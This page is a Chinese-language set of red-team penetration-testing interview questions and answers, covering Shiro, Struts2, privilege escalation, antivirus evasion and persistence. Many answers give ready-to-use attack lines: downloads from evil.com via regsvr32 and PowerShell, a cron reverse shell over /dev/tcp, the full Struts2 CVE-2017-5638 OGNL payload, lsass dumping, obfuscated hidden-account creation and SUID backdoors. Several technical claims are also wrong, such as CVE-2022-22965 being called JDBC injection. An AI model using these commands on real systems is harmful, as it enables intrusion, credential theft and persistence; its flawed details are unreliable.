2025年滲透測試面試題總結-滲透測試紅隊面試七(題目+回答)

網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

滲透測試紅隊面試七

一百八十一、Shiro漏洞類型,721原理,721利用要注意什么?

一百八十二、HVV三大洞

一百八十三、天擎終端防護繞過思路

一百八十四、免殺木馬的思路

一百八十五、JSONP與CORS跨域危害

一百八十六、外網打點進入內網案例

一百八十七、RMI利用原理

一百八十八、域內普通用戶利用

一百八十九、寶塔禁止PHP函數繞過

一百九十、證書透明度的危害

一百九十一、內網滲透降權的作用

一百九十二、Webshell有SYSTEM權限但無法執行命令

一百九十三、TrustedInstaller權限原理

一百九十四、2008服務權限提權

一百九十五、Windows UAC原理

一百九十六、繞過火絨/360添加用戶

一百九十七、偽造釣魚郵箱與風險

一百九十八、默認端口

一百九十九、XSS組合拳Getshell

二百、爛土豆(Rotten Potato)提權原理

二百〇一、PowerShell免殺制作

二百〇二、繞過內存Hash提取查殺

二百〇三、Linux/Windows權限維持

二百〇四、藍隊與紅隊工作流程

二百〇五、Shellcode嵌入正常EXE

二百〇六、Spring框架漏洞

二百〇七、Struts2漏洞利用原理

二百〇八、PHP/Java反序列化漏洞原理與修復

二百〇九、CRLF注入原理

二百一十、PHP LFI漏洞

滲透測試紅隊面試七

一百八十一、shiro漏洞類型,721原理,721利用要注意什么?一百八十二、hvv三大洞?一百八十三、天擎終端防護如何繞過,繞過思路?一百八十四、免殺木馬的思路?一百八十五、jsonp跨域的危害,cors跨域的危害?一百八十六、說出印象比較深刻的一次外網打點進入內網?一百八十七、rmi的利用原理?一百八十八、域內的一個普通用戶(非域用戶)如何進行利用?一百八十九、寶塔禁止PHP函數如何繞過?一百九十、證書透明度的危害?一百九十一、內網滲透降權的作用?一百九十二、webshell有system權限但無法執行命令,怎么辦?一百九十三、TrustedInstall權限的原理是什么?一百九十四、2008的服務權限如何進行提權?一百九十五、Windows UAC原理是什么?一百九十六、Windows添加用戶如何繞過火絨以及360?一百九十七、如何偽造釣魚郵箱?會面臨什么問題?一百九十八、分別說出redis、weblogic、Mongodb、Elasticsearch、ldap、sambda、Jenkins、rmi默認端口。一百九十九、XSS如何配合組合拳進行getshell。二百、爛土豆提權使用過嗎?它的原理?二百〇一、powershell免殺怎么制作?二百〇二、提取內存hash被查殺,如何繞過?二百〇三、分別說下linux、windows的權限維持?二百〇四、如何開展藍隊工作?如何開展紅隊工作?二百〇五、如何把shellcode嵌入到正常exe中?二百〇六、描述下Spring框架的幾個漏洞?二百〇七、說下strust2的漏洞利用原理?二百〇八、php/java反序列化漏洞的原理?解決方案?二百〇九、CRLF注入的原理二百一十、php的LFI,本地包含漏洞原理是什么?寫一段帶有漏洞的代碼。手工的話如何發掘?如果無報錯回顯,你是怎么遍歷文件的?

一百八十一、Shiro漏洞類型,721原理,721利用要注意什么?

  1. 漏洞類型
    • 反序列化漏洞(Shiro-550):因硬編碼密鑰導致攻擊者偽造RememberMe Cookie,利用Apache Commons Collections鏈執行任意代碼。
    • 權限繞過漏洞(CVE-2020-1957等):URL路徑解析缺陷(如/admin/被解析為/admin繞過鑒權)。
    • Padding Oracle攻擊(Shiro-721):CBC加密模式填充錯誤漏洞,可破解密鑰偽造惡意Cookie。
  2. Shiro-721原理
    • 攻擊者需先獲取合法用戶的RememberMe Cookie(需高權限賬戶)。
    • 利用CBC加密的填充錯誤機制,通過多次請求(約數千次)逐字節爆破AES密鑰。
    • 最終構造惡意序列化數據,觸發反序列化漏洞執行代碼。
  3. 利用注意事項
    • 需要穩定的網絡環境(避免請求失敗中斷爆破)。
    • 目標需開啟RememberMe功能且使用默認AES加密模式。
    • 攻擊時間較長,需隱蔽操作避免觸發告警。

一百八十二、HVV三大洞

  1. 未授權訪問
    • Redis/MongoDB未授權:直接連接執行命令或寫入SSH密鑰。
    • K8s API Server暴露:未鑒權下創建Pod或執行容器逃逸。
  2. 遠程代碼執行(RCE)
    • Web應用漏洞:如Fastjson反序列化、Log4j2 JNDI注入。
    • 中間件漏洞:如WebLogic T3協議反序列化、Apache Solr Velocity模板注入。
  3. 弱口令與默認配置
    • 系統/設備弱口令:如Tomcat默認密碼admin:admin
    • 服務默認端口暴露:如Elasticsearch 9200端口未配置訪問控制。

一百八十三、天擎終端防護繞過思路

  1. 進程注入與內存免殺
    • 將惡意代碼注入可信進程(如svchost.exe )或通過反射型DLL加載。
    • 使用工具:Cobalt Strike的shinject、Metasploit的migrate
  2. 驅動級繞過
    • 利用已簽名驅動的漏洞(如某些硬件廠商驅動)加載內核模塊。
    • 例如:通過BYOVD(Bring Your Own Vulnerable Driver)攻擊。
  3. 白名單程序濫用
    • 劫持系統工具執行惡意操作,如:
      • WMI:通過wmic執行遠程腳本。
      • MsBuild:編譯內嵌惡意代碼的C#項目文件。

一百八十四、免殺木馬的思路

  1. 代碼混淆與加密
    • 使用AES加密Shellcode,運行時動態解密(如使用VirtualAlloc分配內存執行)。
    • 工具:sgn(Shikata Ga Nai)編碼器、ConfuserEx混淆器。
  2. 合法工具加載
    • 利用微軟簽名的程序加載惡意代碼,如:
      • Regsvr32:執行遠程腳本(regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll )。
      • Mshta:運行HTA文件執行PowerShell命令。
  3. 反沙箱與反調試
    • 檢測虛擬機環境(如檢查進程名vmtoolsd、注冊表鍵值)。
    • 延遲執行:通過Sleep()函數或條件觸發繞過行為分析。

一百八十五、JSONP與CORS跨域危害

  1. JSONP危害
    • 敏感數據泄露:若回調函數名未過濾,攻擊者可劫持返回數據(如竊取用戶身份信息)。
    • CSRF攻擊:結合JSONP接口實現跨站請求偽造(如修改用戶密碼)。
  2. CORS危害
    • 配置不當導致越權:如Access-Control-Allow-Origin: *允許任意域讀取數據。
    • 結合XSS攻擊:通過CORS信任域下的XSS竊取其他域的數據(如Cookie)。

一百八十六、外網打點進入內網案例

案例背景:某企業官網存在Git源碼泄露,導致數據庫密碼暴露。
攻擊鏈

  1. 外網突破:通過泄露的數據庫密碼登錄后臺,上傳Webshell。
  2. 內網滲透:發現內網Jenkins服務(未授權訪問),利用Groovy腳本執行命令。
  3. 橫向移動:通過Jenkins節點獲取域用戶憑證,利用SMB爆破橫向至域控服務器。

一百八十七、RMI利用原理

  1. 攻擊面
    • RMI Registry反序列化:向Registry發送惡意對象觸發反序列化(如CVE-2017-3248)。
    • 遠程對象方法調用:通過動態類加載(DGC)下載惡意類文件執行代碼。
  2. 利用工具
    • ysoserial:生成Gadget鏈Payload(如JRMPClient)。
    • Exploit步驟
       

      bash

      復制

      java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'cmd.exe /c calc'


一百八十八、域內普通用戶利用

  1. 信息收集
    • PowerView:枚舉域內主機(Get-NetComputer)、共享(Invoke-ShareFinder)。
    • BloodHound:分析域內權限關系,尋找攻擊路徑(如ACL濫用)。
  2. 橫向移動
    • Pass-the-Hash:使用Mimikatz或Impacket的psexec.py 傳遞NTLM哈希。
    • MS17-010漏洞:利用永恒之藍攻擊未修補的主機。
  3. 提權路徑
    • SeImpersonate權限濫用:使用Juicy Potato或PrintSpoofer獲取SYSTEM權限。
    • 服務配置錯誤:利用弱權限服務路徑替換DLL或EXE文件。

一百八十九、寶塔禁止PHP函數繞過

  1. 函數替代
    • 禁用system但允許shell_exec:使用shell_exec('whoami')執行命令。
    • 反引號執行echo \whoami`;`。
  2. LD_PRELOAD劫持
    • 編寫惡意共享庫(.so),通過putenv設置LD_PRELOAD劫持函數調用。
    • 代碼示例:
       

      php

      復制

      putenv("LD_PRELOAD=/tmp/evil.so"); mail('','','',''); // 觸發新進程加載惡意庫


一百九十、證書透明度的危害

  1. 子域名劫持
    • 攻擊者監控證書透明度日志,發現未使用的子域并注冊指向惡意服務器。
    • 例如:dev.example.com 在證書日志中存在但DNS未解析,攻擊者劫持后釣魚。
  2. 偽造證書信任鏈
    • 利用透明度日志中的過期證書,偽裝成合法服務進行中間人攻擊。

一百九十一、內網滲透降權的作用

  1. 規避檢測
    • 降權至普通用戶減少日志告警(如域管操作觸發SIEM規則)。
  2. 權限維持隱蔽性
    • 低權限賬戶不易被清理(如域管定期重置密碼)。

一百九十二、Webshell有SYSTEM權限但無法執行命令

  1. 權限限制分析
    • AppLocker策略:限制非白名單程序執行(如禁止cmd.exe )。
    • 殺軟攔截:靜態檢測Webshell關鍵詞或動態攔截惡意進程。
  2. 繞過方法
    • COM對象調用:使用WScript.Shell執行命令。
       

      php

      復制

      $wsh = new COM('WScript.Shell'); $wsh->Run('cmd.exe /c whoami', 0, false);

    • DLL側加載:通過rundll32加載惡意DLL。

一百九十三、TrustedInstaller權限原理

  1. 權限層級
    • TrustedInstaller是Windows資源的所有者(如系統文件),權限高于SYSTEM。
  2. 提權方法
    • 通過服務配置修改:劫持TrustedInstaller服務路徑加載惡意程序。
    • 利用漏洞:如CVE-2020-1048(打印服務漏洞)獲取權限。

一百九十四、2008服務權限提權

  1. 服務路徑劫持
    • 查找弱權限服務(accesschk.exe -uwcqv),替換其二進制文件。
  2. DLL劫持
    • 將惡意DLL放置到服務加載路徑中,劫持合法DLL調用。
  3. SC命令濫用
    • 通過sc config修改服務BIN_PATH指向惡意程序。

一百九十五、Windows UAC原理

  1. 權限隔離機制
    • 默認以標準用戶權限運行進程,提權需用戶確認或數字簽名驗證。
  2. 繞過方法
    • 白名單程序濫用:如cmstp.exemsiexec.exe 執行惡意代碼。
    • UAC Bypass漏洞:如CVE-2019-1388(證書對話框提權)。

一百九十六、繞過火絨/360添加用戶

  1. 直接修改注冊表
    • 使用reg add添加用戶鍵值,避開用戶態Hook:
       

      cmd

      復制

      reg add "HKLM\SAM\SAM\Domains\Account\Users\000003F0" /v F /t REG_BINARY /d [hex數據]

  2. Powershell繞過
    • 使用混淆腳本調用net user命令:
       

      powershell

      復制

      &('ne'+'t') u'ser' evil P@ssw0rd /add


一百九十七、偽造釣魚郵箱與風險

  1. 偽造方法
    • 域名仿冒:注冊相似域名(如examp1e.com 代替example.com )。
    • SPF記錄偽造:利用SPF配置不嚴格(?all)繞過郵件服務器驗證。
  2. 面臨風險
    • DMARC檢測:收件方服務器可能標記郵件為垃圾或拒收。
    • 法律風險:可能觸犯《刑法》第二百八十五條(非法侵入計算機信息系統罪)。

一百九十八、默認端口

服務默認端口
Redis6379
WebLogic7001
MongoDB27017
Elasticsearch9200/9300
LDAP389/636
Samba445/139
Jenkins8080
RMI Registry1099

一百九十九、XSS組合拳Getshell

  1. XSS + CSRF
    • 通過XSS竊取管理員Cookie,偽造CSRF請求上傳Webshell。
  2. XSS + CORS
    • 利用CORS配置錯誤,通過XSS跨域讀取內網接口數據,獲取敏感信息。
  3. XSS + 文件上傳
    • 通過XSS劫持管理員會話,調用后臺文件上傳功能傳馬。

二百、爛土豆(Rotten Potato)提權原理

  1. 令牌模擬漏洞
    • 利用Windows本地NTLM認證流程(NTLM over localhost),將SYSTEM令牌模擬到當前進程。
  2. 利用條件
    • 需具備SeImpersonatePrivilege權限(IIS、SQL Server等默認擁有)。
  3. 攻擊步驟
    • 觸發本地NTLM認證,通過DCOM服務劫持端口,最終獲取SYSTEM令牌。

二百〇一、PowerShell免殺制作

  1. 代碼混淆
    • 使用Invoke-Obfuscation工具混淆腳本:
       

      powershell

      復制

      Invoke-Obfuscation -ScriptPath evil.ps1 -Command 'Token\All\1,Launcher\PS\124'

  2. 內存加載
    • 反射加載Shellcode:
       

      powershell

      復制

      $bytes = (New-Object Net.WebClient).DownloadData('http://evil.com/shellcode.bin'); [Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null,$null);


二百〇二、繞過內存Hash提取查殺

  1. 定制化工具
    • 修改Mimikatz源碼(如函數名、字符串特征),繞過靜態檢測。
  2. 直接內存讀取
    • 使用C++編寫工具直接讀取lsass.exe 內存,避開API Hook。
  3. 合法憑證導出
    • 使用微軟官方工具procdump導出內存鏡像,本地解析:
       

      cmd

      復制

      procdump.exe -ma lsass.exe lsass.dmp


二百〇三、Linux/Windows權限維持

LinuxWindows
1. SSH后門:修改~/.ssh/authorized_keys添加攻擊者公鑰。1. 注冊表啟動項HKLM\Software\Microsoft\Windows\CurrentVersion\Run添加惡意路徑。
2. Cron定時任務:添加* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'2. 計劃任務schtasks /create /tn "Update" /tr "C:\evil.exe" /sc minute /mo 1
3. SUID提權chmod +s /bin/bash,通過bash -p獲取root權限。3. 服務后門:創建服務指向惡意程序,sc create EvilService binPath= "C:\evil.exe"

二百〇四、藍隊與紅隊工作流程

藍隊(防御)

  1. 監控與分析:通過SIEM(如Splunk)實時分析日志,檢測異常行為(如異常登錄、橫向移動)。
  2. 威脅狩獵:使用EDR工具(如CrowdStrike)主動搜尋隱藏威脅。
  3. 應急響應:隔離受感染主機,分析攻擊鏈,修復漏洞并溯源攻擊者。

紅隊(攻擊模擬)

  1. 情報收集:通過OSINT(如Shodan、Hunter.io )收集目標信息。
  2. 漏洞利用:模擬APT攻擊鏈(如魚叉郵件釣魚+內網滲透)。
  3. 報告輸出:提供詳細攻擊路徑與防御建議(如加固建議、檢測規則)。

二百〇五、Shellcode嵌入正常EXE

  1. 資源文件插入
    • 使用Visual Studio將Shellcode作為資源文件嵌入,運行時加載執行:
       

      cpp

      復制

      HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); LPVOID pShellcode = LockResource(LoadResource(NULL, hRes));

  2. 附加節區注入
    • 使用CFF Explorer在PE文件中添加新節區,寫入Shellcode并修改入口點。
  3. 進程鏤空(Process Hollowing)
    • 創建合法進程(如svchost.exe ),卸載其內存,寫入Shellcode并執行。

二百〇六、Spring框架漏洞

  1. CVE-2022-22963(SpEL注入)
    • 攻擊者通過spring-cloud-function的SpEL表達式執行任意命令。
  2. CVE-2022-22965(JDBC注入)
    • 利用Spring MVC參數綁定漏洞,通過惡意請求修改JDBC URL觸發RCE。
  3. CVE-2018-1273(遠程代碼執行)
    • 通過Spring Data Commons的嵌套屬性綁定漏洞執行OGNL表達式。

二百〇七、Struts2漏洞利用原理

  1. OGNL表達式注入
    • 攻擊者通過惡意參數(如Content-Typefilename)注入OGNL表達式。
    • 示例(CVE-2017-5638):
       

      http

      復制

      POST /struts2-showcase/upload.action HTTP/1.1 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}


二百〇八、PHP/Java反序列化漏洞原理與修復

  1. 漏洞原理
    • PHPunserialize()函數觸發魔術方法(如__wakeup()__destruct())執行代碼。
    • JavareadObject()方法反序列化惡意對象,觸發Gadget鏈(如Apache Commons Collections)。
  2. 修復方案
    • 輸入過濾:避免反序列化用戶可控數據。
    • 安全配置:PHP禁用危險類(phar.readonly=On ),Java使用SerialKiller庫過濾類。

二百〇九、CRLF注入原理

  1. 攻擊場景
    • 注入\r\n分割HTTP頭,如:
       

      http

      復制

      GET /%0d%0aSet-Cookie:evil=value HTTP/1.1

      服務器響應:
       

      http

      復制

      HTTP/1.1 200 OK Set-Cookie: evil=value

  2. 利用后果
    • 設置惡意Cookie、緩存投毒(如X-Forwarded-For頭偽造IP)。

二百一十、PHP LFI漏洞

  1. 漏洞代碼示例
     

    php

    復制

    <?php $page = $_GET['page']; include($page . '.html'); ?>

    • 攻擊者可傳入page=../../etc/passwd%00,利用空字節截斷后綴。
  2. 手工挖掘技巧
    • 路徑遍歷測試?page=..%2f..%2fetc/passwd
    • 偽協議利用?page=php://filter/convert.base64-encode/resource=index.php 讀取源碼。
  3. 無回顯文件遍歷
    • 時間盲注:通過include延時判斷文件存在性(如/proc/self/cwd/路徑遍歷)。
    • 錯誤觸發:包含不存在的文件觸發Warning日志,觀察服務器響應差異。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/79578.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/79578.shtml
英文地址,請注明出處:http://en.pswp.cn/web/79578.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Unity動畫系統使用整理 --- Playable

??Playable API?? 是一個強大的工具&#xff0c;用于更靈活地控制動畫、音頻、腳本等時間軸內容的播放和混合。它提供了比傳統 Animator 更底層、更可控的方式管理時間軸行為&#xff0c;尤其適合復雜動畫邏輯或動態內容組合的場景。 優點&#xff1a; 1.Playables API 支…

基于STM32、HAL庫的BMP390L氣壓傳感器 驅動程序設計

一、簡介: BMP390L 是 Bosch Sensortec 生產的一款高精度氣壓傳感器,專為需要精確測量氣壓和海拔高度的應用場景設計。BMP390L 具有更低的功耗、更高的精度和更快的響應速度。 二、硬件接口: BMP390L 引腳STM32L4XX 引腳說明VDD3.3V電源GNDGND地SCLPB6 (I2C1 SCL)I2C 時鐘線…

Arduino快速入門

Arduino快速入門指南 一、硬件準備 選擇開發板&#xff1a; 推薦使用 Arduino UNO&#xff08;兼容性強&#xff0c;適合初學者&#xff09;&#xff0c;其他常見型號包括NANO&#xff08;體積小&#xff09;、Mega&#xff08;接口更多&#xff09;。準備基礎元件&#xff1a…

破解 Qt QProcess 在 Release 模式下的“卡死”之謎

在使用 Qt 的 QProcess 以調用外部 ffmpeg/ffprobe 進行音視頻處理時&#xff0c;常見的工作流程是&#xff1a; gatherParams&#xff1a;通過 ffprobe 同步獲取媒體文件的參數&#xff08;分辨率、采樣率、聲道數、碼率等&#xff09;。 reencode&#xff1a;逐個文件調用 f…

MySQL 中 UPDATE 結合 SELECT 和 UPDATE CASE WHEN 的示例

概述 以下是 MySQL 中 UPDATE 結合 SELECT 和 UPDATE CASE WHEN 的示例&#xff1a; 一、UPDATE 結合 SELECT&#xff08;跨表更新&#xff09; 場景&#xff1a;根據 orders 表中的訂單總金額&#xff0c;更新 users 表中用戶的 total_spent 字段。 -- 創建測試表 CREATE T…

【MCP】魔搭社區MCP服務(高德地圖、everything文件搜索)

【MCP】魔搭社區MCP服務&#xff08;高德地圖、everything文件搜索&#xff09; 1、上手使用2、環境配置&#xff08;1&#xff09;cherry-studio配置&#xff08;2&#xff09;添加魔搭大模型服務&#xff08;如果已經設置了其他大模型服務&#xff0c;可跳過&#xff09;&…

MapReduce 的工作原理

MapReduce 是一種分布式計算框架&#xff0c;用于處理和生成大規模數據集。它將任務分為兩個主要階段&#xff1a;Map 階段和 Reduce 階段。開發人員可以使用存儲在 HDFS 中的數據&#xff0c;編寫 Hadoop 的 MapReduce 任務&#xff0c;從而實現并行處理1。 MapReduce 的工作…

MCU開啟浮點計算FPU

FPU 測試 1. FPU 簡介2. 協處理器控制寄存器&#xff08;CPACR&#xff09;3. 開啟FPU4. 驗證FPU&#xff08;Julia 分形實驗&#xff09; 1. FPU 簡介 FPU 即浮點運算單元&#xff08;Float Point Unit&#xff09;。浮點運算&#xff0c;對于定點 CPU&#xff08;沒有 FPU 的…

進程相關面試題20道

一、基礎概念與原理 1.進程的定義及其與程序的本質區別是什么&#xff1f; 答案&#xff1a;進程是操作系統分配資源的基本單位&#xff0c;是程序在數據集合上的一次動態執行過程。核心區別&#xff1a;? 動態性&#xff1a;程序是靜態文件&#xff0c;進程是動態執行實例…

React Hooks 精要:從入門到精通的進階之路

Hooks 是 React 16.8 引入的革命性特性,它讓函數組件擁有了類組件的能力。以下是 React Hooks 的詳細使用指南。 一、基礎 Hooks 1. useState - 狀態管理 import { useState } from react;function Counter() {const [count, setCount] = useState(0); // 初始值為0return …

springboot3+vue3融合項目實戰-大事件文章管理系統-更新用戶頭像

大致分為三步 首先在usercontroller里面加入方法 PatchMapping ("/updateAvatar")public Result upadateAvatar(RequestParam URL String avatarUrl){userService.updateAvater(avatarUrl);return Result.success();}url注解能驗證傳入的url是不是合法的&#xff0c…

Mosaic數據增強技術

Mosaic 數據增強技術是一種在計算機視覺領域廣泛應用的數據增強方法。下面是Mosaic 數據增強技術原理的詳細介紹 一、原理 Mosaic 數據增強是將多張圖像&#xff08;通常是 4 張&#xff09;按照一定的規則拼接在一起&#xff0c;形成一張新的圖像。在拼接過程中&#xff0c;會…

Git安裝教程及常用命令

1. 安裝 Git Bash 下載 Git 安裝包 首先&#xff0c;訪問 Git 官方網站 下載適用于 Windows 的 Git 安裝包。 安裝步驟 啟動安裝程序&#xff1a;雙擊下載的 .exe 文件&#xff0c;啟動安裝程序。選擇安裝選項&#xff1a; 安裝路徑&#xff1a;可以選擇默認路徑&#xff0…

學習日志04 java

PTA上的練習復盤 java01 編程題作業感悟&#xff1a; 可以用ai指導自己怎么調試&#xff0c;但是不要把調代碼這過程里面的精華交給ai&#xff0c;就是自己去修正錯誤不能讓ai代勞&#xff01;~~~ 1 scanner.close() Scanner *** new Scanner(System.in); ***.close(); …

AI 在模仿歷史語言方面面臨挑戰:大型語言模型在生成歷史風格文本時的困境與研究進展

概述 在當今數字化時代&#xff0c;人工智能&#xff08;AI&#xff09;技術在諸多領域展現出了強大的能力&#xff0c;但在處理歷史語言這一特定任務時&#xff0c;卻遭遇了不小的挑戰。美國和加拿大的研究人員通過合作發現&#xff0c;像 ChatGPT 這樣的大型語言模型&#x…

基于 Spring Boot 瑞吉外賣系統開發(十二)

基于 Spring Boot 瑞吉外賣系統開發&#xff08;十二&#xff09; 菜品刪除 單擊“批量刪除”和“刪除”時&#xff0c;會攜帶需要刪除的菜品的id以delete請求方式向“/dish”發送請求。 URLhttp://127.0.0.1:8080/dish調用方法DELETE參數ids DishController添加刪除方法 …

Day22打卡-復習

復習日 仔細回顧一下之前21天的內容&#xff0c;沒跟上進度的同學補一下進度。 作業&#xff1a; 自行學習參考如何使用kaggle平臺&#xff0c;寫下使用注意點&#xff0c;并對下述比賽提交代碼 泰坦尼克號人員生還預測https://www.kaggle.com/competitions/titanic/overview K…

L48.【LeetCode題解】904. 水果成籃

目錄 1.題目 2.分析 方法1:暴力枚舉 方法2:暴力解法的優化:滑動窗口 代碼 方法3:優化方法2:使用數組充當哈希表 方法4:四個變量分別充當籃子和籃子中水果的個數(最快!!!) 代碼 容易忽略的點 1.題目 https://leetcode.cn/problems/fruit-into-baskets/ 你正在探訪一家農…

Leetcode-BFS問題

LeetCode-BFS問題 1.Floodfill問題 1.圖像渲染問題 [https://leetcode.cn/problems/flood-fill/description/](https://leetcode.cn/problems/flood-fill/description/) class Solution {public int[][] floodFill(int[][] image, int sr, int sc, int color) {//可以借助另一…

Typora+PicGo+Gitee圖床配置教程 自動圖片上傳

配置步驟 #mermaid-svg-aPUbWs43XR5Rh7vf {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-aPUbWs43XR5Rh7vf .error-icon{fill:#552222;}#mermaid-svg-aPUbWs43XR5Rh7vf .error-text{fill:#552222;stroke:#552222;}#…